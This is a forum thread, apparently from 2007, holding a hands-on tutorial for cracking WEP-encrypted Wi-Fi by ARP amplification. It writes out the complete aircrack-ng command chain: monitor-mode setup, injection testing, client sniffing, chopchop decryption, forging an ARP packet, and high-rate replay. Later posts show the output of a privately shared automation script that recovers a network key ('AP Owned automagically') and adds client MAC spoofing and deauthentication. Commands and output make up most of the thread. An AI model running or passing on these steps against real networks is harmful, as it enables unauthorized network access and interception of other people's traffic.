Tutorial: The art of ARP amplification

**shamanvirtuel** · 08-04-2007, 01:36 PM

I FINALLY MANAGE ARP AMPLI 3X
i manage to achieve near 1150pps !!!!! wich is more than 3X the packet rate with normal injection
more than 30000 IVs in 30 secs......I love you xploitz......
so yes my dream of seeing AIR injecting at 1200 pps is possible........
fonction will be available in air beta 3 !!!

here the specs of attack
dest ip : client ip
source ip : 10.255.255.255
max inj rate : 1024 pps
card rate : 36 M (at 54 i get nothing at aireplay-ng test....)

here is the screen of airodump éééé

have a look at running time compare to IVs .....;éééé

i will try to make a vid tonight....

**shamanvirtuel** · 08-05-2007, 01:37 AM

this is not a step by step newb tut, so i don't explain in details all steps because you are intended to know that before use that tut....

1) WE SCAN FOR APS

Code:

bt ~ # iwlist scan
lo        Interface doesn't support scanning.

eth0      Interface doesn't support scanning.

eth1      Scan completed :
          Cell 01 - Address: 00:1A:6B:04:9E:2F
                    ESSID:"Livebox-a5a3"
                    Protocol:IEEE 802.11bg
                    Mode:Master
                    Channel:10
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 6 Mb/s; 9 Mb/s
                              11 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s; 36 Mb/s
                              48 Mb/s; 54 Mb/s
                    Quality=74/100  Signal level=-44 dBm  Noise level=-60 dBm
                    Extra: Last beacon: 48ms ago

rausb0    Interface doesn't support scanning.

we saw Livebox-a5a3 channel 10

2) WE NOW PREPARE CARD FOR INJECTION

Code:

ifconfig rausb0 up; iwconfig rausb0 mode monitor channel 10 rate 1M
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1

the last two commands are for rt73 only (it activate prism headers and injection)

3) WE NOW TEST INJECTION

Code:

bt ~ # aireplay-ng --test rausb0 -B
Interface rausb0 -> driver: Unknown
23:43:35  rausb0 channel: 10
23:43:35  Trying broadcast probe requests...
23:43:35  Injection is working!
23:43:36  Found 1 AP

23:43:36  Trying directed probe requests...
23:43:36  00:1A:6B:04:9E:2F - channel: 10 - 'Livebox-a5a3'
23:43:37  Ping (min/avg/max): 3.208ms/28.342ms/51.995ms Power: 110.70
23:43:37  30/30: 100%

23:43:37  Trying directed probe requests for all bitrates...

23:43:37  00:1A:6B:04:9E:2F - channel: 10 - 'Livebox-a5a3'
23:43:38  Probing at 1.0 Mbps:  30/30: 100%
23:43:39  Probing at 2.0 Mbps:  30/30: 100%
Couldn't set rate to 5.5MBit. (54.0MBit instead)
23:43:39  Probing at 6.0 Mbps:  29/30:  96%
23:43:40  Probing at 9.0 Mbps:  30/30: 100%
23:43:41  Probing at 11.0 Mbps: 30/30: 100%
23:43:42  Probing at 12.0 Mbps: 30/30: 100%
23:43:43  Probing at 18.0 Mbps: 30/30: 100%
23:43:43  Probing at 24.0 Mbps: 29/30:  96%
23:43:44  Probing at 36.0 Mbps: 30/30: 100%
23:43:45  Probing at 48.0 Mbps: 28/30:  93%
23:43:46  Probing at 54.0 Mbps: 23/30:  76%

we see that the higher rate for 100 % hit is 36M/S
so we set the rate of our card

Code:

iwconfig rausb0 rate 36M

4)WE NOW SNIFF FOR A CLIENT

Code:

bt ~ # airodump-ng -c 10 --bssid 00:1A:6B:04:9E:2F rausb0

CH 10 ][ Elapsed: 20 s ][ 2007-08-04 23:47

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES

 00:1A:6B:04:9E:2F  109 100      197      109    0  10  54  WEP  WEP         L

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:1A:6B:04:9E:2F  00:1B:77:32:4E:EF   84  54-54     0      120

now we have
AP MAC : 00:1A:6B:04:9E:2F
CLIENT MAC : 00:1B:77:32:4E:EF
AP CHAN : 10
ESSID : Livebox-a5a3

5)WE NOW DO A CHOPCHOP FOR DCRYPT IPS
we limit packet size to 68(ARP Wireless)

Code:

bt ~ # aireplay-ng --chopchop -m 68 -n 68 -h 00:1B:77:32:4E:EF  -a 00:1A:6B:04:9E:2F rausb0
Interface rausb0 -> driver: Unknown
The interface MAC (00:18:F8:A4:DE:B7) doesn't match the specified MAC (-h).
        ifconfig rausb0 hw ether 00:1B:77:32:4E:EF
Read 129 packets...

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:1A:6B:04:9E:2F
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:1B:77:32:4E:EF

        0x0000:  0841 2c00 001a 6b04 9e2f 001b 7732 4eef  .A,...k../..w2N.
        0x0010:  ffff ffff ffff 4047 6078 b500 021a 39ee  ......@G`x....9.
        0x0020:  6d7d 8b79 765c 90b9 62a0 4db5 1135 b9a6  m}.yv\..b.M..5..
        0x0030:  fb52 4682 4690 c506 8584 96e9 09a7 06fc  .RF.F...........
        0x0040:  8e0e 1f91                                ....

Use this packet ? y

Saving chosen packet in replay_src-0804-235136.cap

23:51:46  Waiting for beacon frame (BSSID: 00:1A:6B:04:9E:2F)
Offset   67 ( 0% done) | xor = 28 | pt = B9 |   20 frames written in    61ms
Offset   66 ( 2% done) | xor = 3F | pt = 20 |  103 frames written in   309ms
Offset   65 ( 5% done) | xor = D3 | pt = DD |  205 frames written in   615ms
Offset   64 ( 8% done) | xor = 5B | pt = D5 |  103 frames written in   309ms
Offset   63 (11% done) | xor = FD | pt = 01 |  100 frames written in   301ms
Offset   62 (14% done) | xor = 07 | pt = 01 |  208 frames written in   624ms
Offset   61 (17% done) | xor = 0F | pt = A8 |  205 frames written in   614ms
Offset   60 (20% done) | xor = C9 | pt = C0 |  208 frames written in   624ms
Offset   59 (23% done) | xor = E9 | pt = 00 |  100 frames written in   300ms
Offset   58 (26% done) | xor = 96 | pt = 00 |  208 frames written in   623ms
Offset   57 (29% done) | xor = 84 | pt = 00 |  309 frames written in   929ms
Offset   56 (32% done) | xor = 85 | pt = 00 |  100 frames written in   300ms
Offset   55 (35% done) | xor = 06 | pt = 00 |  208 frames written in   623ms
Offset   54 (38% done) | xor = C5 | pt = 00 |  206 frames written in   618ms
Offset   53 (41% done) | xor = 9C | pt = 0C |  103 frames written in   309ms
Offset   52 (44% done) | xor = 47 | pt = 01 |  103 frames written in   309ms
Offset   51 (47% done) | xor = 2A | pt = A8 |  207 frames written in   621ms
Offset   50 (50% done) | xor = 86 | pt = C0 |  205 frames written in   615ms
Offset   49 (52% done) | xor = BD | pt = EF |  103 frames written in   310ms
Offset   48 (55% done) | xor = B5 | pt = 4E |  104 frames written in   310ms
Offset   47 (58% done) | xor = 94 | pt = 32 |  100 frames written in   301ms
Offset   46 (61% done) | xor = CE | pt = 77 |  309 frames written in   927ms
Offset   45 (64% done) | xor = 2E | pt = 1B |  208 frames written in   625ms
Offset   44 (67% done) | xor = 11 | pt = 00 |  310 frames written in   929ms
Offset   43 (70% done) | xor = B4 | pt = 01 |  205 frames written in   615ms
Offset   42 (73% done) | xor = 4D | pt = 00 |  103 frames written in   309ms
Offset   41 (76% done) | xor = A4 | pt = 04 |  205 frames written in   614ms
Offset   40 (79% done) | xor = 64 | pt = 06 |  103 frames written in   310ms
Offset   39 (82% done) | xor = B9 | pt = 00 |  205 frames written in   615ms
Offset   38 (85% done) | xor = 98 | pt = 08 |  313 frames written in   939ms
Offset   37 (88% done) | xor = 5D | pt = 01 |  310 frames written in   929ms
Offset   36 (91% done) | xor = 76 | pt = 00 |  100 frames written in   301ms
Offset   35 (94% done) | xor = 7F | pt = 06 |  310 frames written in   930ms
Offset   34 (97% done) | xor = 83 | pt = 08 |  206 frames written in   617ms

Saving plaintext in replay_dec-0804-235205.cap
Saving keystream in replay_dec-0804-235205.xor

Completed in 18s (1.67 bytes/s)

now we got a decrypted packet.....we open it in tcpdump

Code:

tcpdump -r replay_dec-0804-235205.cap
reading from file replay_dec-0804-235205.cap, link-type IEEE802_11 (802.11)
23:52:05.775485 arp who-has 192.168.1.1 tell 192.168.1.12

now we get the client ip 192.168.1.12, it will be our destination adress for forging a new arp packetwe will use 10.255.255.255 for source adress

6) FORGING SPECIAL ARP PACKET

Code:

bt ~ # packetforge-ng -0 -a 00:1A:6B:04:9E:2F  -h 00:1B:77:32:4E:EF  -k 192.168.1.12 -l 10.255.255.255 -w arprequest -y replay_dec-0804-235205.xor
Wrote packet  to: arprequest

7)REPLAY THIS PACKET

Code:

konsole -e aireplay-ng --interactive -x 1024 -r arprequest rausb0 & konsole -e airodump-ng -c 10 --bssid 00:1A:6B:04:9E:2F -w arpampli rausb0

enjoy when you click yes your ivs flying....

the results you will get grantly depends of distance to ap, pwr & rxq
it will be between 600 & 1200 (i achieve 1139)

1200 means enough iv to crack 128 key in 30 secs ......

enjoy bros....
hope you like it ...;
edited i just capture more than 1million ivs in less than 14 minutes , who say better ???

**shamanvirtuel** · 08-05-2007, 11:38 PM

for illustrate my tut on arp ampli i build this afternoon a little powerfull script

first thing it's private so only my usuals testers can ask for it
it's called SVAAS (Shaman Virtuel ARP Amplification Script)

all is automagik, you will have to enter only the rate of your card when asking

here are the steps of scripts

1 - test injection
2 - find good rates for injection
3 - ask for the rate you want"
4 - fix channel and rate of card
5 - associate
6 -launch chopchop limited to ARP wireless packet(68bytes) and a deauth process for speed things
7 - analyse chopchop decrypted packet and extract IPs
8 - Build ARP packet with good ips for amplification
9 -launch a replay and airodump-ng to capture ivs
10 - 30 secs after launch of aireplay-ng aircrack-ng begin
11 - total running time is displayed at the end

usage : svaas [APMAC] [CLIENTMAC] [CHANNEL] [NUMBER OF DEAUTH] [DEVICE]

example : svaas 00:1A:6B:04:9E:2F 00:1B:77:32:4E:EF 9 10 rausb0

the system will respond :

Code:

Welcome to Sh@m@nVirTuel's ARP Amplification Script
Feel free to Contact me on R-E Forum

VERIFY INJECTION CAPABILITY

Interface rausb0 -> driver: Unknown
22:01:17  rausb0 channel: 10
22:01:17  Trying broadcast probe requests...
22:01:17  Injection is working!

PREPARING CARD FOR ATTACK

Card locked on AP channel

Trying to determine the best rate for this card
...

Interface rausb0 -> driver: Unknown
 at 1.0 Mbps:   30/30: 100%
 at 2.0 Mbps:   30/30: 100%
 at 9.0 Mbps:   30/30: 100%
 at 11.0 Mbps:  30/30: 100%
 at 12.0 Mbps:  30/30: 100%
 at 18.0 Mbps:  30/30: 100%
These rates are ok
Choose your rate (type in number ie 1, 36, 54)
18


ASSOCIATION OF YOUR CARD

Interface rausb0 -> driver: Unknown
The interface MAC (00:18:F8:A4:DE:B7) doesn't match the specified MAC (-h).
        ifconfig rausb0 hw ether 00:1B:77:32:4E:EF
22:01:35  Waiting for beacon frame (BSSID: 00:1A:6B:04:9E:2F)
22:01:36  Sending Authentication Request
22:01:37  Authentication successful
22:01:37  Sending Association Request
22:01:37  Association successful :-)

CAPTURE OF AN ARP PACKET AND DECRYPT IP PROCESS

Interface rausb0 -> driver: Unknown
The interface MAC (00:18:F8:A4:DE:B7) doesn't match the specified MAC (-h).
        ifconfig rausb0 hw ether 00:1B:77:32:4E:EF
Saving chosen packet in replay_src-0805-220152.cap

22:01:52  Waiting for beacon frame (BSSID: 00:1A:6B:04:9E:2F)
Offset   67 ( 0% done) | xor = 66 | pt = 1D |  224 frames written in   674ms
Offset   66 ( 2% done) | xor = DF | pt = CC |   97 frames written in   291ms
Offset   65 ( 5% done) | xor = 6C | pt = 8B |  102 frames written in   305ms
Offset   64 ( 8% done) | xor = 1C | pt = D9 |  102 frames written in   307ms
Offset   63 (11% done) | xor = 37 | pt = 01 |  204 frames written in   611ms
Offset   62 (14% done) | xor = FF | pt = 01 |  309 frames written in   927ms
Offset   61 (17% done) | xor = 70 | pt = A8 |  102 frames written in   305ms
Offset   60 (20% done) | xor = 56 | pt = C0 |  203 frames written in   610ms
Offset   59 (23% done) | xor = 97 | pt = 00 |  102 frames written in   306ms
Offset   58 (26% done) | xor = 83 | pt = 00 |  102 frames written in   307ms
Offset   57 (29% done) | xor = B3 | pt = 00 |  308 frames written in   923ms
Offset   56 (32% done) | xor = 68 | pt = 00 |   99 frames written in   296ms
Offset   55 (35% done) | xor = 5C | pt = 00 |  207 frames written in   621ms
Offset   54 (38% done) | xor = 16 | pt = 00 |  203 frames written in   609ms
Offset   53 (41% done) | xor = 02 | pt = 10 |  102 frames written in   306ms
Offset   52 (44% done) | xor = A9 | pt = 01 |  101 frames written in   305ms
Offset   51 (47% done) | xor = FD | pt = A8 |  204 frames written in   612ms
Offset   50 (50% done) | xor = 32 | pt = C0 |  204 frames written in   612ms
Offset   49 (52% done) | xor = E8 | pt = EF |   94 frames written in   280ms
Offset   48 (55% done) | xor = AA | pt = 4E |  104 frames written in   314ms
Offset   47 (58% done) | xor = 9A | pt = 32 |  101 frames written in   302ms
Offset   46 (61% done) | xor = 21 | pt = 77 |  310 frames written in   931ms
Offset   45 (64% done) | xor = 9C | pt = 1B |  204 frames written in   612ms
Offset   44 (67% done) | xor = 8E | pt = 00 |  311 frames written in   932ms
Offset   43 (70% done) | xor = 53 | pt = 01 |  206 frames written in   618ms
Offset   42 (73% done) | xor = D1 | pt = 00 |  105 frames written in   314ms
Offset   41 (76% done) | xor = EE | pt = 04 |  206 frames written in   620ms
Offset   40 (79% done) | xor = A6 | pt = 06 |  105 frames written in   315ms
Offset   39 (82% done) | xor = 51 | pt = 00 |  210 frames written in   628ms
Offset   38 (85% done) | xor = 85 | pt = 08 |  310 frames written in   932ms
Offset   37 (88% done) | xor = E8 | pt = 01 |  307 frames written in   920ms
Offset   36 (91% done) | xor = 65 | pt = 00 |  311 frames written in   932ms
Offset   35 (94% done) | xor = 69 | pt = 06 |  309 frames written in   928ms
Offset   34 (97% done) | xor = 6C | pt = 08 |  203 frames written in   610ms

Saving plaintext in replay_dec-0805-220212.cap
Saving keystream in replay_dec-0805-220212.xor

Completed in 19s (1.58 bytes/s)

reading from file /root/replay_dec-0805-220212.cap, link-type IEEE802_11 (802.11)
reading from file /root/replay_dec-0805-220212.cap, link-type IEEE802_11 (802.11)

DETECTED ACCESS POINT IP : 192.168.1.1
DETECTED CLIENT IP :  192.168.1.16

BUILDING A NEW ARP PACKET

DESTINATION IP :  192.168.1.16
SOURCE IP : 10.255.255.255

Wrote packet  to: /root/arprequest

REASSOCIATION OF YOUR CARD

Interface rausb0 -> driver: Unknown
The interface MAC (00:18:F8:A4:DE:B7) doesn't match the specified MAC (-h).
        ifconfig rausb0 hw ether 00:1B:77:32:4E:EF
22:02:12  Waiting for beacon frame (BSSID: 00:1A:6B:04:9E:2F)
22:02:13  Sending Authentication Request
22:02:14  Authentication successful
22:02:14  Sending Association Request
22:02:14  Association successful :-)

REPLAY PROCESS OF NEW PACKET, we will also Capture Replies in /root/ARPAMPLI-01.ivs
Automated Aircrack-ng process will be launch in 30 secs
Please Wait....

CRACKING PROCESS IN PROGRESS
Opening /root/ARPAMPLI-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21187 ivs.

                                                                                  Aircrack-ng 1.0 r634


                                                                  [00:00:26] Tested 153411 keys (got 30569 IVs)

   KB    depth   byte(vote)
    0   28/  1   C2(43776) 26(43520) 3C(43520) AF(43520) 33(43264) 6F(43264) B8(43264) EF(43264) C3(43008) E6(43008) EA(43008) ED(43008) 48(42752) 4B(42752)
    1    0/  1   43(58624) AF(46848) C9(46848) E7(46080) 45(45824) 23(45568) 97(45568) E0(45568) 2B(45056) 53(45056) A0(45056) EA(45056) CB(44800) E4(44800)
    2    2/  1   99(47872) 36(47104) 92(47104) 31(46592) 66(46592) 1C(46080) B1(46080) B5(45824) 3A(45568) 38(45312) 7A(45312) 32(45056) 9D(45056) DE(45056)
    3   22/  3   7E(44032) 2A(43776) 20(43520) 2B(43520) FB(43520) 5A(43264) A8(43008) 37(42752) 48(42752) 4F(42752) AA(42752) 01(42496) 69(42496) 85(42496)
    4   45/  4   BF(42496) 0D(42240) 29(42240) 2C(42240) 3B(42240) 7B(42240) 4E(41984) AC(41984) CA(41984) F3(41984) 01(41728) 6E(41728) 9E(41728) B9(41728)

Failed. Next try with 25000 IVs.
Starting PTW attack with 40276 ivs.
             KEY FOUND! [ FA:49:26:DC:5A:E6:C9:F7:72:A5:DE:1E:2A ]
        Decrypted correctly: 100%



Game Over
We will now close Aireplay-ng and Airodump-ng windows

HOPE YOU LIKE IT
PM me on R-E forum for feedback or help

AP Owned automagically in

real    1m54.869s
user    0m15.529s
sys     0m10.377s

Nice , no ?

it's not designed to be the faster one, because of injection test and rate choosing process
because of chopchop process wich can be long to sniff a 68b only packet.....but this is needed to decrypt easily ip in the script

Those of my USUAL TESTERS, can ask for it, it's not public for the moment

**balding_parrot** · 08-05-2007, 11:46 PM

I am sure that ANY of your usual testers would not object to you sending it to them in a PM

NICE WORK YET AGAIN

**shamanvirtuel** · 08-06-2007, 12:15 AM

i clean things on the code, cause it's a little bit crude

i just add new option have a look last post i modified the usage line i add a "Deauth number" param

i send it tomorrow
btw feel free to have a look to codes... i really have phun and think it's well structured....

**balding_parrot** · 08-06-2007, 12:27 AM

So your using my word now huh ?

Looking forward to the PM already

**shamanvirtuel** · 08-06-2007, 01:32 AM

PM sent Balding_Parrot Have Phun....

**balding_parrot** · 08-06-2007, 01:42 AM

Thanks for the code.

I didn't mean you had to send it before you were ready, only that I was looking forward to the PM when you send it tomorrow.

Will PM you to let you know how it works for me, as soon as I get the chance.

Thanks Shaman

You know I am always happy to test your fantastic (dangerous

) scripts.

**shamanvirtuel** · 08-06-2007, 03:46 AM

so i do some mods to the scripts

i add auto macchanger to the client mac, because with the time i got "several deauth packets......" message and chopchop stop f.....ing all the script...

i also rearrange the preparation part before attack here is the new initialization output

Code:

svaas 00:1A:6B:04:9E:2F 00:1B:77:32:4E:EF 10 7 rausb0

Welcome to Sh@m@nVirTuel's ARP Amplification Script
Feel free to Contact me on R-E Forum

PREPARING CARD FOR ATTACK

Current MAC: 00:1b:77:32:4e:ef (unknown)
Faked MAC:   00:1b:77:32:4e:ef (unknown)
It's the same MAC!!

Monitor Mode set on rausb0

Trying to determine the best rate for this card
Please wait...
Interface rausb0 -> driver: Unknown
 at 1.0 Mbps:   30/30: 100%
 at 6.0 Mbps:   30/30: 100%
 at 12.0 Mbps:  30/30: 100%
 at 18.0 Mbps:  30/30: 100%
 at 36.0 Mbps:  30/30: 100%
 at 54.0 Mbps:  30/30: 100%
These rates are ok
Choose your rate (type in number ie 1, 36, 54)
54


Card now locked on Channel 10
Card now locked on Bitrate 54M

VERIFY INJECTION CAPABILITY

Interface rausb0 -> driver: Unknown
02:37:53  rausb0 channel: 10
02:37:53  Trying broadcast probe requests...
02:37:53  Injection is working!

Now it's really fonctionnal,
i may add a driver switch to command line for accurate my macchanger and monitor method for ath drivers or other cards where ifconfig xx down ; macchanger --mac clientmac xx ; ifconfig xx up is not possible for changing mac
and where iwconfig xx mode monitor is not enough (like ath)

so for the moment there's card limitation
if you can do
ifconfig xx down ; macchanger --mac clientmac xx ; ifconfig xx up
iwconfig xx mode monitor channel apchan rate xx

well your card will be fully compatible with svaas

New version ready but not already uploaded to the dl url i give for testers who request it ... please update in a few minutes to an hour
=)

**shamanvirtuel** · 08-06-2007, 04:35 AM

Updated version available

download from same url as the first one
....

enjoy
....

BackTrack Linux - Penetration Testing Distribution

Thread: Tutorial: The art of ARP amplification

Thread Tools

Search Thread

Display

1139 Packets per secs Injection !!!!!

Final Tutorial for arp Ampli 3x

new private script

Posting Permissions